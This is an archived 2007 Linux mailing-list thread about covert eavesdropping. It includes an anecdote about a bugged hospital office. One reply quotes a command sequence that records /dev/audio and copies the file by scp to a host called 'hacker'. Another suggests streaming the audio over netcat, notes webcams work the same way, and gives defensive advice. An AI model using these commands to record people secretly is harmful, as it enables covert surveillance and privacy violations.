[ale] Paranoia, FUD, slow day...

James P. Kinney III jkinney at localnetsolutions.com
Wed Jan 31 18:22:23 EST 2007 

add in a netcat call and pipe the sound to the netcat port and you've
got streaming audio :)

This same process applies to webcams.

The solution is to a) practice good system security and b) leave the
microphones and webcams unplugged. (and c) be aware of what motel
room...)

On Tue, 2007-01-30 at 19:48 -0500, Bob Toxen wrote:
> On Linux, all one needs to do is:
> 
>      cat /dev/audio > listen
>      [wait a while]
>      ^C
>      scp listen to hacker:.
> 
> There are more elegant methods, all of which involve reading
> /dev/audio.  You do have your /dev/audio mode 622, I hope.
> 
> Thanks for the cool story!  I'm seen some industrial espionage too.
> 
> Bob Toxen
> bob at verysecurelinux.com               [Please use for email to me]
> http://www.verysecurelinux.com        [Network&Linux/Unix security consulting]
> http://www.realworldlinuxsecurity.com [My book:"Real World Linux Security 2/e"]
> Quality Linux & UNIX security and SysAdmin & software consulting since 1990.
> 
> "Microsoft: Unsafe at any clock speed!"
>    -- Bob Toxen 10/03/2002
> 
> On Mon, Jan 29, 2007 at 06:28:59PM -0500, Mike Harrison wrote:
> > > (via Mobile providers) to remotely enable the microphone in a cellphone
> > > without the user's knowledge.   How do we know the same thing isn't
> > > possible via our ISPs and our PCs? 
> > 
> > You don't. 
> > 
> > And I wear a tinfoil lined hat. I know. 
> > 
> > But seriously, stupider things have happened - Long non-linux story:
> > 
> > When I worked in hospitals (1980's),  one hospital administrator
> > took me for a walk, and told he he thought his office 
> > was bugged because he was in negotiations for the 
> > purchase of the hospital by a large chain, and they
> > seemed to know too much too quickly. We laughed, 
> > I said we'd go check it out that evening. 
> > 
> > We went in in sock feet.. and eventually (no tech tools, just by looking)
> > found a microphone and transmitter above his desk. We left it alone. 
> > 
> > With the advice of the FBI, we left it in place.
> > The CFO had some really interesting meetings
> > in the Presidents office, and when 
> > the other Hospital made their aquisition bids
> > in person (crossing state lines.. ) they got nailed. 
> > They had documents in posession with information 
> > that had been planted (stupid). They went to jail. 
> > 
> > My point is.. it doesn't just happen on TV, and
> > if the stakes are high enough, anything is possible. 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > _______________________________________________
> > Ale mailing list
> > Ale at ale.org
> > http://www.ale.org/mailman/listinfo/ale
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale
-- 
James P. Kinney III          
CEO & Director of Engineering 
Local Net Solutions,LLC        
770-493-8244                    
http://www.localnetsolutions.com

GPG ID: 829C6CA7 James P. Kinney III (M.S. Physics)
<jkinney at localnetsolutions.com>
Fingerprint = 3C9E 6366 54FC A3FE BA4D 0659 6190 ADC3 829C 6CA7
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part

More information about the Ale mailing list